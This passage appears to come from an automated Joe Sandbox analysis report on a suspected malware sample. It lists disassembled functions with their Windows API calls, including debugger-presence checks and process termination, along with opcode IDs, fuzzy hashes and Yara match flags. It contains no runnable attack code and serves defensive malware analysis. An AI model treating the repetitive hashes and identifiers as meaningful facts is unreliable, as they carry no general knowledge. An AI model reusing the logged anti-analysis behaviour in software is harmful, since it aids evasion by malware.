                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0067B3E3
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0067B3F1
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,#g,00000000,?), ref: 0067B494
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                    • String ID: #g
                                                                                                    • API String ID: 2444527052-3966975450
                                                                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                    • Instruction ID: 1418d961addcf6f7565e98d0366b21ca51b416fad0f8d76ee269a74317a50928
                                                                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                    • Instruction Fuzzy Hash: 3B61F672600206AAD724EB74DC42BFA73EEEF04710F14946EF90DD7286EB74D94187A5
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                    • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0067BCF4,?,00000000), ref: 0067BA6E
                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0067BCF4,?,00000000), ref: 0067BA97
                                                                                                    • GetACP.KERNEL32(?,?,0067BCF4,?,00000000), ref: 0067BAAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction ID: c9d8ac2ce8e8e810b90c46e404f7877c51dc7a4723c2c8ee6e54c192a6e9fc81
                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                    • Instruction Fuzzy Hash: 88218C22600104AAEB35AF65D901BE773A7EF50B60B56E065E90EDB200F732DE81C394
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287132625-0
                                                                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 006721A0
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721AD
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0067BCB5
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0067BD10
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0067BD1F
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00670A1C,00000040,?,00670B3C,00000055,00000000,?,?,00000055,00000000), ref: 0067BD67
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00670A9C,00000040), ref: 0067BD86
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287132625-0
                                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                    • Instruction ID: 510d0eb6b30c1c794968d3f685c1d7c913f6c281db969c7c2b11f0bdf12297e8
                                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                    • Instruction Fuzzy Hash: 3E518371900209AFEB21DFA5DC45BFE77BAFF14700F14D569E908E7290EB719A008B65
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: C$C
                                                                                                    • API String ID: 0-238425240
                                                                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Lg$Lg
                                                                                                    • API String ID: 0-647949388
                                                                                                    • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                    • Instruction ID: 2b478befa2fc38d4bee7e84838559c31daf4c13b420f4d7ca67a4fe976c4eb77
                                                                                                    • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                    • Instruction Fuzzy Hash: 6F022B71E002199BDF14CFA9D8906EDF7F2EF88314F25816AE919E7380D731A9418B84
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2444527052-0
                                                                                                    • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                    • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                    • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                    • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorInfoLastLocale$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2834031935-0
                                                                                                    • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                    • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                    • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                    • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                    • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                    • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                    • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0064DAD7), ref: 0066A732
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0064DAD7), ref: 0066A73C
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0064DAD7), ref: 0066A749
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                    • Instruction ID: d29d838142b8c268e43411d964145e1f37f3b85ae058617ff57682e70e7c642c
                                                                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                    • Instruction Fuzzy Hash: 7D31B2749012189BCB61DF64D989798BBB9AF08711F5042EAE80CA7261E7309F858F49
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                    • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,0067009C,00000000,00457970,0000000C,006701F3,00000000,00000002,00000000), ref: 006700E7
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0067009C,00000000,00457970,0000000C,006701F3,00000000,00000002,00000000), ref: 006700EE
                                                                                                    • ExitProcess.KERNEL32 ref: 00670100
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction ID: d7ec393a8ab9b10722b3de696e73cc2c944ecbf8b4cc55460bff8cfe67e74798
                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                    • Instruction Fuzzy Hash: EBE0B635000648EBDF11AF94DD09A993B6AEB46B56B108068F9098B231CB76EE42DA58
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                    • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                    • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                    • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /
                                                                                                    • API String ID: 0-2043925204
                                                                                                    • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                    • Instruction ID: ebefe57511f9aaecf3447cfe99c4ae44b2f18e13e8f70abed9e9005ca816a8d3
                                                                                                    • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                    • Instruction Fuzzy Hash: 99412872540219AECB209FB9DC4DDFB777AEB80714F1082ADF909D7280EA319D41CB64
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                    • API String ID: 2299586839-2904428671
                                                                                                    • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                    • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                    • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                    • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0064262C
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 006427CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4264772764-0
                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction ID: 4a188b2b1b51d1d653ffd488d4a43286d253aabc2d36a211f8ea23b6f777abf0
                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction Fuzzy Hash: D641412596434095E331FFA5BC55B6533B0FF64B22F10252BE528CB2B2E3B28540C35E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: GetProcAddress.$l
                                                                                                    • API String ID: 0-1376745856
                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                    • Instruction ID: d9cc41b42b4f229157892b242f4d5b2e7fed72a895e1f6ba925a10a4ddd3dd41
                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                    • Instruction Fuzzy Hash: AA316CB6910619DFEB10CF99C880AEEBBF6FF48324F24504AD541A7311D771EA45CBA4
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00676F21,?,?,00000008,?,?,0067F3E2,00000000), ref: 00677153
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction ID: 5e47eddf8982956ebd54495cca1b9860841ca771265ad85b611325c479eef82e
                                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                    • Instruction Fuzzy Hash: 52B13A712146089FD715CF28C48ABA57BE2FF45364F69C658E899CF3A1C335EA92CB40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2955987475-0
                                                                                                    • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                    • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                    • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                    • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 006721A0
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721AD
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0067B900
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2955987475-0
                                                                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                    • Instruction ID: de24986519949dd550641871d5ccc4228187be1c191b45d0559ae1af8b2ef762
                                                                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                    • Instruction Fuzzy Hash: 9121B33255020A9BDF249F24DC42BBA73ADEF01314F10917AEF19D6251EB35DD44C754
                                                                                                    APIs
